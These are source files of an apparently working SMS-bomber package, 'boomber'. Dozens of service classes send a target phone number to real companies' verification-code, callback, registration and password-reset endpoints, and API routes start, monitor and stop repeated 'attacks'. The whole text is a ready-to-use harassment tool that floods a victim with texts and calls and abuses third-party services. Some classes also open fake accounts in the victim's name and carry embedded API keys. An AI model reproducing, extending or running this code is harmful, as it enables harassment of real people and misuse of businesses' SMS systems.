        return re.search(pattern, response.text).group(1).strip()

    @staticmethod
    def format(phone: str, mask: str, mask_symbol: str = "*"):
        if len(phone) == mask.count(mask_symbol):
            formatted_phone = ""
            for symbol in mask:
                if symbol == mask_symbol:
                    formatted_phone += phone[0]
                    phone = phone[(len(phone) - 1) * -1 :]
                else:
                    formatted_phone += symbol
        else:
            formatted_phone = phone
        return formatted_phone

    @abstractmethod
    async def run(self):
        raise NotImplementedError



from boomber.services.service import Service


class Loany(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://loany.com.ua/funct/ajax/registration/code",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class Boosty(Service):
    async def run(self):
        await self.post(
            "https://api.boosty.to/oauth/phone/authorize",
            data={"client_id": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class DeliMobil(Service):
    async def run(self):
        await self.post(
            "https://api.delitime.ru/api/v2/signup",
            data={
                "SignupForm[username]": self.formatted_phone,
                "SignupForm[device_type]": 3,
            },
        )



from boomber.services.service import Service


class TaxiRitm(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://taxi-ritm.ru/ajax/ppp/ppp_back_call.php?URL=/",
            data={"RECALL": "Y", "BACK_CALL_PHONE": self.formatted_phone},
        )



from boomber.services.service import Service


class PirogiN1(Service):
    async def run(self):
        await self.post(
            "https://piroginomerodin.ru/index.php?route=sms/login/sendreg",
            data={"telephone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class CallMyPhone(Service):
    async def run(self):
        await self.post(
            "https://callmyphone.org/do-call",
            data={"phone": "+" + self.formatted_phone, "browser": "undefined"},
        )



from boomber.services.service import Service


class KFC(Service):
    async def run(self):
        await self.post(
            "https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms",
            json={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class QBBox(Service):
    async def run(self):
        await self.post(
            "https://qbbox.ru/api/user",
            json={"phone": self.formatted_phone, "account_type": 1},
        )



from boomber.services.service import Service


class ShopAndShow(Service):
    async def run(self):
        await self.post(
            "https://shopandshow.ru/sms/password-request/",
            data={"phone": "+" + self.formatted_phone, "resend": 0},
        )



from boomber.services.service import Service


class Beltelecom(Service):
    async def run(self):
        await self.post(
            "https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class Rbt(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.rbt.ru/user/sendCode/",
            data={"phone": self.format(self.formatted_phone, "+* (***) ***-**-**")},
        )



from boomber.services.service import Service


class SushiFuji(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://sushifuji.ru/sms_send_ajax.php",
            data={"name": "false", "phone": self.formatted_phone},
        )



from random import randint

from boomber.services.service import Service


class FlashCall(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://i-dgtl.ru/curl/flashcall.php",
            data={
                "check": "",
                "flashcall-code": randint(1000, 9999),
                "flashcall-tel": self.phone,
            },
        )
        await self.post(
            "https://i-dgtl.ru/curl/sms.php",
            data={"check": "", "flashcall-tel": self.phone},
        )



from boomber.services.service import Service


class SportmasterUA(Service):
    phone_codes = [380]

    async def run(self):
        await self.get(
            "https://www.sportmaster.ua/",
            params={
                "module": "users",
                "action": "SendSMSReg",
                "phone": self.formatted_phone,
            },
        )



from boomber.services.service import Service


class ICQ(Service):
    async def run(self):
        await self.post(
            "https://www.icq.com/smsreg/requestPhoneValidation.php",
            data={
                "msisdn": self.formatted_phone,
                "locale": "en",
                "countryCode": "ru",
                "version": "1",
                "k": "ic1rtwz1s1Hj1O0r",
                "r": "46763",
            },
        )



from boomber.services.service import Service


class ETM(Service):
    async def run(self):
        await self.post(
            "https://www.etm.ru/cat/runprog.html",
            data={
                "m_phone": self.phone,
                "mode": "sendSms",
                "syf_prog": "clients-services",
                "getSysParam": "yes",
            },
        )



from boomber.services.service import Service


class Benzuber(Service):
    async def run(self):
        await self.post(
            "https://app.benzuber.ru/login", data={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class SmartSpace(Service):
    async def run(self):
        await self.post(
            "https://smart.space/api/users/request_confirmation_code/",
            json={"mobile": "+" + self.formatted_phone, "action": "confirm_mobile"},
        )



from boomber.services.service import Service


class Tabasko(Service):
    async def run(self):
        await self.post(
            "https://tabasko.su/",
            data={
                "IS_AJAX": "Y",
                "COMPONENT_NAME": "AUTH",
                "ACTION": "GET_CODE",
                "LOGIN": self.formatted_phone,
            },
        )



from boomber.services.service import Service


class OkeanSushi(Service):
    phone_codes = [7]

    async def run(self):
        await self.get(
            "https://okeansushi.ru/includes/contact.php",
            params={
                "call_mail": "1",
                "ajax": "1",
                "name": self.russian_name,
                "phone": self.format(self.phone, "8 (***) ***-**-**"),
                "call_time": "1",
                "pravila2": "on",
            },
        )



from random import randint

from boomber.services.service import Service


class Tanuki(Service):
    async def run(self):
        await self.post(
            "https://www.tanuki.ru/api/",
            json={
                "header": {
                    "version": "2.0",
                    "userId": f"002ebf12-a125-5ddf-a739-67c3c5d{randint(20000, 90000)}",
                    "agent": {"device": "desktop", "version": "undefined undefined"},
                    "langId": "1",
                    "cityId": "9",
                },
                "method": {"name": "sendSmsCode"},
                "data": {"phone": f"(+{self.country_code}){self.phone}", "type": 1},
            },
        )



from boomber.services.service import Service


class SipNet(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper",
            params={"oper": 9, "callmode": 1, "phone": self.phone},
        )



from boomber.services.service import Service


class LogisticTech(Service):
    async def run(self):
        await self.post(
            "https://api-rest.logistictech.ru/api/v1.1/clients/request-code",
            json={"phone": self.formatted_phone},
            headers={"Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9"},
        )



from typing import Union

from fastapi import APIRouter
from loguru import logger

from boomber.service import prepare_services

router = APIRouter()


@logger.catch
@router.get("/count")
def get_services_count(
    country_code: Union[
        int, str
    ]  # It will be str if user have selected "Not listed" country
):
    services = prepare_services()

    if country_code in services:
        return {"count": len(services[country_code])}
    return {"count": len(services["other"])}



from boomber.services.service import Service


class Kaspi(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://kaspi.kz/util/send-app-link", data={"address": self.phone},
        )



from boomber.services.service import Service


class MakiMaki(Service):
    phone_codes = [7]

    async def run(self):
        await self.get(
            "https://makimaki.ru/system/callback.php",
            params={
                "cb_fio": self.russian_name,
                "cb_phone": self.format(self.formatted_phone, "+* *** *** ** **"),
            },
        )



import asyncio
import re
import uuid

import phonenumbers
from fastapi import APIRouter, HTTPException
from loguru import logger

from boomber.app.models import AttackModel, StatusModel
from boomber.app.status import status, attack_tasks
from boomber.main import AttackLogic

router = APIRouter()


@logger.catch
@router.post("/start")
async def start_attack(attack: AttackModel):
    only_digits_phone = re.sub("[^0-9]", "", attack.phone)
    country_code = phonenumbers.parse(f"+{only_digits_phone}").country_code
    # May seem confusing, but phone is actually a full international phone: 79001234567

    attack_id = uuid.uuid4().hex
    status[attack_id] = {"started_at": None, "currently_at": None, "end_at": None}

    attack_logic = AttackLogic(
        attack_id, attack.number_of_cycles, country_code, only_digits_phone
    )

    task = asyncio.create_task(attack_logic.perform_attack())
    attack_tasks[attack_id] = task

    return {"success": True, "id": attack_id}


@logger.catch
@router.get("/{attack_id}/status", response_model=StatusModel)
def get_attack_status(attack_id: str):
    if attack_id not in status:
        raise HTTPException(status_code=404)
    return StatusModel(**status[attack_id])


@logger.catch
@router.post("/{attack_id}/stop")
def stop_attack(attack_id: str):
    if attack_id not in attack_tasks:
        raise HTTPException(status_code=404)

    status[attack_id]["currently_at"] = status[attack_id]["end_at"] = 1
    attack_tasks[attack_id].cancel()

    return {"success": True}



from boomber.services.service import Service


class RuTube(Service):
    async def run(self):
        await self.post(
            "https://pass.rutube.ru/api/accounts/phone/send-password/",
            json={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class AlfaLife(Service):
    async def run(self):
        await self.post(
            "https://alfalife.cc/auth.php", data={"phone": self.phone},
        )



from boomber.services.service import Service


class Invitro(Service):
    async def run(self):
        await self.post(
            "https://lk.invitro.ru/sp/mobileApi/createUserByPassword",
            data={
                "password": self.password,
                "application": "lkp",
                "login": "+" + self.formatted_phone,
            },
        )



from boomber.services.service import Service


class SushiLaguna(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://xn--80aaispoxqe9b.xn--p1ai/user_account/ajax.php?do=sms_code",
            data={"phone": self.format(self.phone, "8(***)***-**-**")},
        )



from boomber.services.service import Service


class Makarolls(Service):
    async def run(self):
        await self.post(
            "https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php",
            data={"data": self.formatted_phone, "metod": "postreg"},
        )



from boomber.services.service import Service


class Dianet(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://my.dianet.com.ua/send_sms/", data={"phone": self.phone},
        )



from boomber.services.service import Service


class Karusel(Service):
    async def run(self):
        await self.post(
            "https://app.karusel.ru/api/v1/phone/", data={"phone": self.formatted_phone}
        )



from boomber.services.service import Service


class Sunlight(Service):
    async def run(self):
        await self.options("https://api.sunlight.net/v3/customers/authorization/")
        await self.post(
            "https://api.sunlight.net/v3/customers/authorization/",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class PizzaKazan(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://pizzakazan.com/auth/ajax.php",
            data={"phone": "+" + self.formatted_phone, "method": "sendCode"},
        )



from boomber.services.service import Service


class ChefMarket(Service):
    async def run(self):
        await self.get(
            "https://cm2api.chefmarket.ru/api/v1/clients/request-pin",
            json={"phone": self.formatted_phone},
            headers={"Platform-ID": "webDesktop"},
        )



from boomber.services.service import Service


class Avtoobzvon(Service):
    phone_codes = [7]

    async def run(self):
        await self.get(
            "https://avtobzvon.ru/request/makeTestCall",
            params={"to": self.format(self.phone, "(***) ***-**-**")},
        )



from boomber.services.service import Service


class MoneyMan(Service):
    async def run(self):
        await self.post(
            "https://moneyman.ru/registration_api/actions/send-confirmation-code",
            data="+" + self.formatted_phone,
        )



from boomber.services.service import Service


class Kristalnaya(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://kristalnaya.ru/ajax/ajax.php?action=send_one_pas_reg",
            data={
                "data": '{"phone":"%s"}'
                % self.format(self.formatted_phone, "+* (***) ***-**-**"),
            },
        )



from boomber.services.service import Service


class MosPizza(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php",
            data={"name": self.russian_name, "phone": self.formatted_phone},
        )



from boomber.services.service import Service


class Yaponchik(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://yaponchik.net/login/login.php",
            data={
                "login": "Y",
                "countdown": 0,
                "step": "phone",
                "redirect": "/profile/",
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
            },
        )



from boomber.services.service import Service


class PizzaSushiWok(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://pizzasushiwok.ru/index.php",
            data={
                "mod_name": "call_me",
                "task": "request_call",
                "name": self.russian_name,
                "phone": self.format(self.formatted_phone, "8-***-***-**-**"),
            },
        )



from boomber.services.service import Service


class Shafa(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://shafa.ua/api/v3/graphiql",
            json={
                "operationName": "RegistrationSendSms",
                "variables": {"phoneNumber": "+" + self.formatted_phone},
                "query": "mutation RegistrationSendSms($phoneNumber: String!) {\n  unauthorizedSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      field\n      messages {\n        message\n        code\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n",
            },
        )

        await self.post(
            "https://shafa.ua/api/v3/graphiql",
            json={
                "operationName": "sendResetPasswordSms",
                "variables": {"phoneNumber": "+" + self.formatted_phone},
                "query": "mutation sendResetPasswordSms($phoneNumber: String!) {\n  resetPasswordSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      ...errorsData\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment errorsData on GraphResponseError {\n  field\n  messages {\n    code\n    message\n    __typename\n  }\n  __typename\n}\n",
            },
        )



from boomber.services.service import Service


class Tele2(Service):
    async def run(self):
        await self.post(
            "https://msk.tele2.ru/api/validation/number/" + self.formatted_phone,
            json={"sender": "Tele2"},
        )



from boomber.services.service import Service


class Hatimaki(Service):
    async def run(self):
        await self.post(
            "https://www.hatimaki.ru/register/",
            data={
                "REGISTER[LOGIN]": self.formatted_phone,
                "REGISTER[PERSONAL_PHONE]": self.formatted_phone,
                "REGISTER[SMS_CODE]": "",
                "resend-sms": "1",
                "REGISTER[EMAIL]": "",
                "register_submit_button": "Зарегистрироваться",
            },
        )



from boomber.services.service import Service


class Creditter(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://api.creditter.ru/confirm/sms/send",
            json={
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
                "type": "register",
            },
        )



from boomber.services.service import Service


class Vodafone(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://www.vodafone.ua/shop/ru/vodafone_customer/register/sendSms/",
            data={
                "is_ajax": "true",
                "phone_number": self.format(self.formatted_phone, "+**(***) ***-**-**"),
            },
        )



from boomber.services.service import Service


class NovayaLinya(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://www.nl.ua",
            data={
                "component": "bxmaker.authuserphone.login",
                "sessid": "bf70db951f54b837748f69b75a61deb4",
                "method": "sendCode",
                "phone": self.formatted_phone,
                "registration": "N",
            },
        )



from boomber.services.service import Service


class SushiVesla(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://xn--80adjkr6adm9b.xn--p1ai/api/v5/user/start-authorization",
            json={"phone": self.format(self.formatted_phone, "+* *** ***-**-**")},
        )



from boomber.services.service import Service


class MenzaCafe(Service):
    phone_codes = [7]

    async def run(self):
        await self.get(
            "https://menza-cafe.ru/system/call_me.php",
            params={
                "fio": self.russian_name,
                "phone": self.formatted_phone,
                "phone_number": "1",
            },
        )



from boomber.services.service import Service


class SushiRolla(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://sushirolla.ru/page/save.php",
            data={
                "send_me_password": 1,
                "phone": self.format(self.formatted_phone, "+*(***) ***-**-**"),
            },
        )



from boomber.services.service import Service


class SMS4b(Service):
    async def run(self):
        await self.post(
            "https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php",
            data={"demo_number": "+" + self.formatted_phone, "ajax_demo_send": "1"},
        )



from boomber.services.service import Service


class RuTaxi(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://rutaxi.ru/ajax_auth.html", data={"l": self.phone, "c": "3"},
        )



from boomber.services.service import Service


class Rieltor(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://rieltor.ua/api/users/register-sms/",
            json={"phone": self.formatted_phone, "retry": 0},
        )



from boomber.services.service import Service


class Molbulak(Service):
    async def run(self):
        await self.post(
            "https://www.molbulak.ru/ajax/smsservice.php",
            data={"command": "send_code_loan", "phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class Zoloto585(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://zoloto585.ru/api/bcard/reg/",
            json={
                "name": self.russian_name,
                "surname": self.russian_name,
                "patronymic": self.russian_name,
                "sex": "m",
                "birthdate": "11.11.1999",
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
                "email": self.email,
                "city": "Москва",
            },
        )



from boomber.services.service import Service


class Taxi3040(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://3040.com.ua/taxi-ordering",
            data={"callback-phone": self.formatted_phone},
        )



from boomber.services.service import Service


class PanPizza(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode",
            data={"telephone": "8" + self.formatted_phone[1:]},
        )



from boomber.services.service import Service


class PlanetaKino(Service):
    phone_codes = [380]

    async def run(self):
        await self.get(
            "https://cabinet.planetakino.ua/service/sms",
            params={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class Kinoland(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://api.kinoland.com.ua/api/v1/service/send-sms",
            headers={"Agent": "website"},
            json={"Phone": self.formatted_phone, "Type": 1},
        )



from setuptools import setup

NAME = "boomber"
DESCRIPTION = "Открытый и бесплатный СМС бомбер"
URL = "https://github.com/doubledare704/b0mb3r"
EMAIL = ""
AUTHOR = "crinny"
REQUIRES_PYTHON = ">=3.7.0"
VERSION = "3.1.4.1"

with open("requirements.txt", encoding="utf-8") as f:
    REQUIRED = f.readlines()

try:
    with open("README.md", encoding="utf-8") as f:
        long_description = "\n" + f.read()
except FileNotFoundError:
    long_description = DESCRIPTION

setup(
    name=NAME,
    version=VERSION,
    description=DESCRIPTION,
    long_description=DESCRIPTION,
    long_description_content_type="text/markdown",
    author=AUTHOR,
    author_email=EMAIL,
    python_requires=REQUIRES_PYTHON,
    url=URL,
    packages=["boomber"],
    entry_points={
        "console_scripts": ["boomber=boomber.cli:main", "bomber=boomber.cli:main"]
    },
    install_requires=REQUIRED,
    extras_require={},
    package_data={"boomber": ["services/*", "app/*", "app/*/*", "app/static/*/*"]},
    license="Mozilla Public License 2.0",
    classifiers=[
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Operating System :: Android",
        "Operating System :: Microsoft :: Windows",
        "Topic :: Internet",
        "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
    ],
)



from boomber.services.service import Service


class FiestaPizza(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://2407.smartomato.ru/account/session",
            json={
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
                "g-recaptcha-response": None,
            },
        )



from boomber.services.service import Service


class Sedi(Service):
    phone_codes = [7]

    async def run(self):
        await self.get(
            "https://msk1.sedi.ru/webapi",
            params={
                "callback": "jQuery19107992940218113256_1595059640271",
                "q": "get_activation_key",
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
                "way": "bysms",
                "usertype": "customer",
                "lang": "ru-RU",
                "apikey": "EF96ADBE-2DFC-48F7-AF0A-69A007223039",
            },
        )



from boomber.services.service import Service


class Citilink(Service):
    async def run(self):
        await self.post(
            f"https://www.citilink.ru/registration/confirm/phone/+{self.formatted_phone}/"
        )



from boomber.services.service import Service


class IevaPhone(Service):
    async def run(self):
        await self.get(
            "https://ievaphone.com/call-my-phone/web/request-free-call",
            params={
                "phone": self.formatted_phone,
                "domain": "IEVAPHONE",
                "browser": "undefined",
            },
        )



from boomber.services.service import Service


class IQLab(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://iqlab.com.ua/session/ajaxregister",
            data={
                "cellphone": self.format(self.formatted_phone, "+** (***) *** ** **"),
            },
        )



from boomber.services.service import Service


class Zoopt(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://zoopt.ru/api/",
            data={
                "module": "salin.core",
                "class": r"BonusServer\Auth",
                "action": "SendSms",
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
            },
        )



from boomber.services.service import Service


class Pomodoro(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://butovo.pizzapomodoro.ru/ajax/user/auth.php",
            data={
                "AUTH_ACTION": "SEND_USER_CODE",
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
            },
        )



from boomber.services.service import Service


class Kyivstar(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://cas-api.kyivstar.ua/api/sendSms",
            data={"lang": "uk", "msisdn": self.formatted_phone},
        )



from boomber.services.service import Service


class Niyama(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.niyama.ru/ajax/sendSMS.php",
            data={
                "REGISTER[PERSONAL_PHONE]": self.formatted_phone,
                "code": "",
                "sendsms": "Выслать код",
            },
        )



from boomber.services.service import Service


class SignalIs(Service):
    async def run(self):
        await self.post(
            "https://deathstar.signal.is/auth",
            data={"phone": "+" + self.formatted_phone},
        )



from typing import Optional

from pydantic import BaseModel


class StatusModel(BaseModel):
    started_at: Optional[str]
    currently_at: Optional[int]
    end_at: Optional[int]


class AttackModel(BaseModel):
    number_of_cycles: int
    phone: str



from boomber.services.service import Service


class Odnoklassniki(Service):
    async def run(self):
        await self.post(
            "https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone",
            data={"st.r.phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class Worki(Service):
    async def run(self):
        await self.post(
            "https://api.iconjob.co/api/auth/verification_code",
            json={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class RichFamily(Service):
    async def run(self):
        await self.post(
            "https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php",
            data={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class Youla(Service):
    async def run(self):
        await self.post(
            "https://youla.ru/web-api/auth/request_code",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class WifiMetro(Service):
    async def run(self):
        await self.post(
            "https://cabinet.wi-fi.ru/api/auth/by-sms",
            data={"msisdn": self.formatted_phone},
            headers={"App-ID": "cabinet"},
        )



from boomber.services.service import Service


class BamperBy(Service):
    async def run(self):
        await self.post(
            "https://bamper.by/registration/?step=1",
            data={
                "phone": "+" + self.formatted_phone,
                "submit": "Запросить смс подтверждения",
                "rules": "on",
            },
        )



from boomber.services.service import Service


class PayLate(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://paylate.ru/registry",
            data={
                "mobile": self.format(self.formatted_phone, "+*-***-***--"),
                "first_name": self.russian_name,
                "last_name": self.russian_name,
                "nick_name": self.russian_name,
                "gender-client": 1,
                "email": self.email,
                "action": "registry",
            },
        )



from boomber.services.service import Service


class WebBankir(Service):
    async def run(self):
        await self.post(
            "https://ng-api.webbankir.com/user/v2/create",
            json={
                "lastName": self.russian_name,
                "firstName": self.russian_name,
                "middleName": self.russian_name,
                "mobilePhone": self.formatted_phone,
                "email": self.email,
                "smsCode": "",
            },
        )



from boomber.services.service import Service


class MnogoMenu(Service):
    async def run(self):
        await self.get(
            f"http://mnogomenu.ru/office/password/reset/{self.format(self.formatted_phone, '+* (***) *** ** **')}",
        )



from boomber.services.service import Service


class Finam(Service):
    async def run(self):
        await self.post(
            "https://www.finam.ru/api/smslocker/sendcode",
            data={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class PrivatBankCard(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://carddesign.privatbank.ua/phone",
            data={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class Cian(Service):
    async def run(self):
        await self.post(
            "https://api.cian.ru/sms/v1/send-validation-code/",
            json={"phone": "+" + self.formatted_phone, "type": "authenticateCode"},
        )



from boomber.services.service import Service


class EasyPay(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://api.easypay.ua/api/auth/register",
            json={"phone": self.formatted_phone, "password": self.password},
        )



from boomber.services.service import Service


class MobilePlanet(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://mobileplanet.ua/register",
            data={
                "klient_name": self.username,
                "klient_phone": "+" + self.formatted_phone,
                "klient_email": self.email,
            },
        )



from boomber.services.service import Service


class KoronoPay(Service):
    async def run(self):
        await self.post(
            "https://koronapay.com/transfers/online/api/users/otps",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class MonoBank(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://www.monobank.com.ua/api/mobapplink/send",
            data={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class MTSTv(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code",
            params={"msisdn": self.formatted_phone},
        )
